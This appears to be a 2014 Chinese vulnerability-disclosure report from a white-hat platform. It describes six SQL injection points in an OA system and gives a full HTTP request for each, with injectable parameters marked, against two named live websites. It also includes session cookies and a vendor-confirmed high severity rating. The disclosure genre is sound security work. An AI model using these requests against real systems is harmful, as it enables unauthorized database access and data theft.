2014-11-09: 细节已通知厂商并且等待厂商处理中 2014-11-13: 厂商已经确认,细节仅向厂商公开 2014-11-23: 细节向核心白帽子及相关领域专家公开 2014-12-03: 细节向普通白帽子公开 2014-12-13: 细节向实习白帽子公开 2014-12-24: 细节向公众公开
SQL注入打包
对于躺枪的网站深表歉意哈~被测网站:http://gl.triolion.com/ && http://oaf.yitoa.com:6688/版本信息分别如下:
说明:主要以前面的网站为例,与后者交叉的证明两个SQL注入为通用型即可。SQL注入漏洞(共6处)1# 注入点1
GET /homepage/Homepage.jsp?hpid=4*&subCompanyId=1&isfromportal=1&isfromhp=0 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://gl.triolion.com/wui/main.jsp?templateId=1Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveDNT: 1Host: gl.triolion.comCookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
另一站点同样存在
GET /homepage/Homepage.jsp?hpid=21&subCompanyId=21&isfromhp=1&isfromportal=0&hastemplate= HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://oaf.yitoa.com:6688/leftFrame.jspAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveDNT: 1Host: oaf.yitoa.com:6688Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4
2# 注入点2
GET /page/element/7/News.jsp?ebaseid=7&eid=17*&styleid=1&hpid=4&subCompanyId=1&e71415018052369= HTTP/1.1Host: gl.triolion.comProxy-Connection: keep-aliveAccept: text/html, */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
GET //page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateHost: oaf.yitoa.com:6688DNT: 1Proxy-Connection: Keep-AliveCookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4
3# 注入点3
GET /CRM/data/ViewCustomerBase.jsp?requestid=-1*&isrequest=&CustomerID=11613 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://gl.triolion.com/CRM/data/ViewCustomer.jsp?CustomerID=11613*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveDNT: 1Host: gl.triolion.comCookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
4# 注入点4
POST /page/element/compatible/view.jsp?ebaseid=9&eid=23*&styleid=1&hpid=4&subCompanyId=1&e71415018052423= HTTP/1.1Host: gl.triolion.comProxy-Connection: keep-aliveContent-Length: 0Accept: */*Origin: http://gl.triolion.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
5# 注入点5
GET /page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415=' HTTP/1.1Host: gl.triolion.comProxy-Connection: keep-aliveAccept: text/html, */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
6# 注入点6
GET /proj/data/ViewProject.jsp?ProjID=56* HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://gl.triolion.com/proj/search/searchtask.jsp?e71415500119375=Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveDNT: 1Host: gl.triolion.comCookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
同上
危害等级:高
漏洞Rank:15
确认时间:2014-11-13 13:40
暂无